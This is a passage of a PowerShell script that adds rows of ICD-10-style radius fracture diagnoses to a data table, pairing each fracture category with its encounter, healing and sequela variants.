type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, left arm","Nondisplaced segmental fracture of shaft of radius, left arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, left arm","Nondisplaced segmental fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, left arm","Nondisplaced segmental fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, left arm","Nondisplaced segmental fracture of shaft of radius, left arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, left arm","Nondisplaced segmental fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, left arm","Nondisplaced segmental fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, left arm","Nondisplaced segmental fracture of shaft of radius, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, unspecified arm","Nondisplaced segmental fracture of shaft of radius, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, unspecified arm","Nondisplaced segmental fracture of shaft of radius, unspecified arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, unspecified arm","Nondisplaced segmental fracture of shaft of radius, unspecified arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, unspecified arm","Nondisplaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, unspecified arm","Nondisplaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, unspecified arm","Nondisplaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, unspecified arm","Nondisplaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, unspecified arm","Nondisplaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, unspecified arm","Nondisplaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, unspecified arm","Nondisplaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, unspecified arm","Nondisplaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, unspecified arm","Nondisplaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, unspecified arm","Nondisplaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, unspecified arm","Nondisplaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, unspecified arm","Nondisplaced segmental fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of radius, unspecified arm","Nondisplaced segmental fracture of shaft of radius, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of right radius","Galeazzi's fracture of right radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of right radius","Galeazzi's fracture of right radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of right radius","Galeazzi's fracture of right radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of right radius","Galeazzi's fracture of right radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of right radius","Galeazzi's fracture of right radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of right radius","Galeazzi's fracture of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of right radius","Galeazzi's fracture of right radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of right radius","Galeazzi's fracture of right radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of right radius","Galeazzi's fracture of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of right radius","Galeazzi's fracture of right radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of right radius","Galeazzi's fracture of right radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of right radius","Galeazzi's fracture of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of right radius","Galeazzi's fracture of right radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of right radius","Galeazzi's fracture of right radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of right radius","Galeazzi's fracture of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of right radius","Galeazzi's fracture of right radius, sequela") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of left radius","Galeazzi's fracture of left radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of left radius","Galeazzi's fracture of left radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of left radius","Galeazzi's fracture of left radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of left radius","Galeazzi's fracture of left radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of left radius","Galeazzi's fracture of left radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of left radius","Galeazzi's fracture of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of left radius","Galeazzi's fracture of left radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of left radius","Galeazzi's fracture of left radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of left radius","Galeazzi's fracture of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of left radius","Galeazzi's fracture of left radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of left radius","Galeazzi's fracture of left radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of left radius","Galeazzi's fracture of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of left radius","Galeazzi's fracture of left radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of left radius","Galeazzi's fracture of left radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of left radius","Galeazzi's fracture of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of left radius","Galeazzi's fracture of left radius, sequela") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of unspecified radius","Galeazzi's fracture of unspecified radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of unspecified radius","Galeazzi's fracture of unspecified radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of unspecified radius","Galeazzi's fracture of unspecified radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of unspecified radius","Galeazzi's fracture of unspecified radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of unspecified radius","Galeazzi's fracture of unspecified radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of unspecified radius","Galeazzi's fracture of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of unspecified radius","Galeazzi's fracture of unspecified radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of unspecified radius","Galeazzi's fracture of unspecified radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of unspecified radius","Galeazzi's fracture of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of unspecified radius","Galeazzi's fracture of unspecified radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of unspecified radius","Galeazzi's fracture of unspecified radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of unspecified radius","Galeazzi's fracture of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of unspecified radius","Galeazzi's fracture of unspecified radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of unspecified radius","Galeazzi's fracture of unspecified radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of unspecified radius","Galeazzi's fracture of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Galeazzi's fracture of unspecified radius","Galeazzi's fracture of unspecified radius, sequela") + $null = $DiagnosisList.Rows.Add("Bent bone of right radius","Bent bone of right radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Bent bone of right radius","Bent bone of right radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Bent bone of right radius","Bent bone of right radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Bent bone of right radius","Bent bone of right radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Bent bone of right radius","Bent bone of right radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Bent bone of right radius","Bent bone of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Bent bone of right radius","Bent bone of right radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Bent bone of right radius","Bent bone of right radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Bent bone of right radius","Bent bone of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Bent bone of right radius","Bent bone of right radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Bent bone of right radius","Bent bone of right radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Bent bone of right radius","Bent bone of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Bent bone of right radius","Bent bone of right radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Bent bone of right radius","Bent bone of right radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Bent bone of right radius","Bent bone of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Bent bone of right radius","Bent bone of right radius, sequela") + $null = $DiagnosisList.Rows.Add("Bent bone of left radius","Bent bone of left radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Bent bone of left radius","Bent bone of left radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Bent bone of left radius","Bent bone of left radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Bent bone of left radius","Bent bone of left radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Bent bone of left radius","Bent bone of left radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Bent bone of left radius","Bent bone of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Bent bone of left radius","Bent bone of left radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Bent bone of left radius","Bent bone of left radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Bent bone of left radius","Bent bone of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Bent bone of left radius","Bent bone of left radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Bent bone of left radius","Bent bone of left radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Bent bone of left radius","Bent bone of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Bent bone of left radius","Bent bone of left radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Bent bone of left radius","Bent bone of left radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Bent bone of left radius","Bent bone of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Bent bone of left radius","Bent bone of left radius, sequela") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified radius","Bent bone of unspecified radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified radius","Bent bone of unspecified radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified radius","Bent bone of unspecified radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified radius","Bent bone of unspecified radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified radius","Bent bone of unspecified radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified radius","Bent bone of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified radius","Bent bone of unspecified radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified radius","Bent bone of unspecified radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified radius","Bent bone of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified radius","Bent bone of unspecified radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified radius","Bent bone of unspecified radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified radius","Bent bone of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified radius","Bent bone of unspecified radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified radius","Bent bone of unspecified radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified radius","Bent bone of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Bent bone of unspecified radius","Bent bone of unspecified radius, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, right arm","Other fracture of shaft of radius, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, right arm","Other fracture of shaft of radius, right arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, right arm","Other fracture of shaft of radius, right arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, right arm","Other fracture of shaft of radius, right arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, right arm","Other fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, right arm","Other fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, right arm","Other fracture of shaft of radius, right arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, right arm","Other fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, right arm","Other fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, right arm","Other fracture of shaft of radius, right arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, right arm","Other fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, right arm","Other fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, right arm","Other fracture of shaft of radius, right arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, right arm","Other fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, right arm","Other fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, right arm","Other fracture of shaft of radius, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, left arm","Other fracture of shaft of radius, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, left arm","Other fracture of shaft of radius, left arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, left arm","Other fracture of shaft of radius, left arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, left arm","Other fracture of shaft of radius, left arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, left arm","Other fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, left arm","Other fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, left arm","Other fracture of shaft of radius, left arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, left arm","Other fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, left arm","Other fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, left arm","Other fracture of shaft of radius, left arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, left arm","Other fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, left arm","Other fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, left arm","Other fracture of shaft of radius, left arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, left arm","Other fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, left arm","Other fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, left arm","Other fracture of shaft of radius, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, unspecified arm","Other fracture of shaft of radius, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, unspecified arm","Other fracture of shaft of radius, unspecified arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, unspecified arm","Other fracture of shaft of radius, unspecified arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, unspecified arm","Other fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, unspecified arm","Other fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, unspecified arm","Other fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, unspecified arm","Other fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, unspecified arm","Other fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, unspecified arm","Other fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, unspecified arm","Other fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, unspecified arm","Other fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, unspecified arm","Other fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, unspecified arm","Other fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, unspecified arm","Other fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, unspecified arm","Other fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of radius, unspecified arm","Other fracture of shaft of radius, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of right radius","Unspecified fracture of the lower end of right radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of right radius","Unspecified fracture of the lower end of right radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of right radius","Unspecified fracture of the lower end of right radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of right radius","Unspecified fracture of the lower end of right radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of right radius","Unspecified fracture of the lower end of right radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of right radius","Unspecified fracture of the lower end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of right radius","Unspecified fracture of the lower end of right radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of right radius","Unspecified fracture of the lower end of right radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of right radius","Unspecified fracture of the lower end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of right radius","Unspecified fracture of the lower end of right radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of right radius","Unspecified fracture of the lower end of right radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of right radius","Unspecified fracture of the lower end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of right radius","Unspecified fracture of the lower end of right radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of right radius","Unspecified fracture of the lower end of right radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of right radius","Unspecified fracture of the lower end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of right radius","Unspecified fracture of the lower end of right radius, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of left radius","Unspecified fracture of the lower end of left radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of left radius","Unspecified fracture of the lower end of left radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of left radius","Unspecified fracture of the lower end of left radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of left radius","Unspecified fracture of the lower end of left radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of left radius","Unspecified fracture of the lower end of left radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of left radius","Unspecified fracture of the lower end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of left radius","Unspecified fracture of the lower end of left radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of left radius","Unspecified fracture of the lower end of left radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of left radius","Unspecified fracture of the lower end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of left radius","Unspecified fracture of the lower end of left radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of left radius","Unspecified fracture of the lower end of left radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of left radius","Unspecified fracture of the lower end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of left radius","Unspecified fracture of the lower end of left radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of the lower end of left radius","Unspecified fracture of the lower end of left radius, 